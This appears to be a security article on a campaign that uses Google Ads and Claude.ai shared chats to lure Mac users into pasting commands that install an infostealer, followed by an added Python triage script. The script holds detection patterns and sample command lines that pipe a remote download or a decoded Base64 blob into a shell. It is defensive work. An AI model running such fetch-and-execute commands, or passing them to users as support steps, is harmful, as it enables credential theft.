Hackers Abuse Google Ads and Claude.ai Chats to Push Mac Malware

Overview

A new malvertising campaign is abusing Google Ads and Claude.ai shared chats to trick macOS users into installing malware. Unlike traditional phishing sites, attackers are hosting malicious instructions directly inside Claude’s legitimate chat feature, making the destination URL appear genuine.

Attack Flow

  • Google Ads: Sponsored results for “Claude mac download” point to claude.ai, but lead to malicious shared chats.
  • Shared Chats Weaponized: Attackers pose as “Apple Support,” instructing users to paste commands into Terminal.
  • Payload Delivery:
    • Base64‑encoded shell scripts downloaded from domains like customroofingcontractors[.]com and bernasibutuwqu2[.]com.
    • Scripts run entirely in memory, using polymorphic delivery (unique obfuscation per request) to evade detection.
    • Profiling step checks keyboard locale (e.g., Russian/CIS) before proceeding.
    • Second‑stage payload executed via osascript, giving attackers remote code execution.

Malware Capabilities

  • Variant 1 (profiling): Collects victim IP, hostname, OS version, and locale before payload delivery.
  • Variant 2 (direct execution): Skips profiling and immediately:
    • Harvests browser credentials & cookies.
    • Harvests macOS Keychain contents.
    • Exfiltrates the stolen data to attacker servers (e.g., briskinternet[.]com).
  • Identified as a variant of MacSync infostealer.

Why It’s Dangerous

  • No Fake Domain: Ads point to Anthropic’s real domain, claude.ai.
  • Social Engineering: Non‑technical users are more likely to trust instructions inside a legitimate AI chat.
  • Broader Trend: Similar campaigns have targeted GIMP, Homebrew, ChatGPT, and Grok users.

Defensive Guidance

  • Download Safely: Navigate directly to claude.ai or official documentation for installers.
  • Avoid Terminal Commands: Treat any unsolicited instructions to paste commands with extreme caution.
  • Monitor Systems: Check for suspicious processes masquerading as system binaries (e.g., /usr/libexec/upowerd).
  • Credential Hygiene: Reset browser and Keychain credentials if suspicious installers were executed.
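As an added example (not code from the article or from any vendor it names), the following Python applies simple triage heuristics to shell-history or EDR command-line records. It covers the paste-into-Terminal patterns described under Attack Flow (a download piped straight into a shell, a Base64 blob decoded in memory and executed, osascript used as the second-stage launcher) and the masquerade path given under Monitor Systems. The rule names, the sample history lines and the `.invalid` hostnames are constructed assumptions, not indicators from the campaign.

```python
"""Heuristic triage of command lines for the paste-into-Terminal TTPs above.

Added example, not from the article. The sample input is constructed; the
regexes are deliberately simple so an analyst can extend them.
"""
import re
from typing import Dict, List, Tuple

# Each rule is (label, compiled regex). Every matching rule is reported.
RULES: List[Tuple[str, re.Pattern]] = [
    # Download piped straight into an interpreter: the script never lands on
    # disk, so file-based scanning has nothing to inspect.
    ("download_piped_to_shell",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z|k)?sh\b")),
    # Base64 blob decoded and fed to a shell. macOS base64 uses -D, GNU -d.
    ("base64_decoded_to_shell",
     re.compile(r"\bbase64\s+(-D|-d|--decode)\b[^|]*\|\s*(sudo\s+)?(ba|z|k)?sh\b")),
    # Inline AppleScript execution, the second-stage launcher the article names.
    ("osascript_inline",
     re.compile(r"\bosascript\s+-e\b")),
    # Path the article gives as a masquerade example; upowerd is a Linux daemon
    # and does not belong on a Mac.
    ("masquerade_path",
     re.compile(r"/usr/libexec/upowerd\b")),
]


def triage_command(cmd: str) -> List[str]:
    """Return the labels of every rule that matches one command line."""
    return [label for label, rx in RULES if rx.search(cmd)]


def triage_history(lines: List[str]) -> Dict[str, List[str]]:
    """Map each suspicious command line to its labels; benign lines are dropped."""
    hits: Dict[str, List[str]] = {}
    for line in lines:
        cmd = line.strip()
        labels = triage_command(cmd)
        if labels:
            hits[cmd] = labels
    return hits


# Constructed sample history (not real telemetry). Hosts use the reserved
# .invalid TLD so nothing here resolves.
SAMPLE_HISTORY = [
    "ls -la ~/Downloads",
    "git status",
    "brew install wget",                      # mentions wget but no pipe: benign
    "ps aux | grep upowerd",                  # name only, not the path: benign
    "curl -fsSL https://installer.example.invalid/setup.sh | sh",
    "echo 'Y29uc3RydWN0ZWQgc2FtcGxl' | base64 -D | bash",
    "osascript -e 'do shell script \"echo constructed\"'",
    "/usr/libexec/upowerd --daemon",
]

if __name__ == "__main__":
    for cmd, labels in triage_history(SAMPLE_HISTORY).items():
        print(f"{', '.join(labels):28s} {cmd}")
```

Run over a user's `~/.zsh_history` or an EDR process-creation export, the function returns only the lines worth a human look; the two benign lines that mention `wget` and `upowerd` show why the rules key on pipes and full paths rather than bare keywords.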

Final Thought

This campaign shows how attackers are weaponizing trust in AI platforms. By embedding malicious instructions inside legitimate Claude chats, they bypass traditional phishing red flags. For defenders, the lesson is clear:
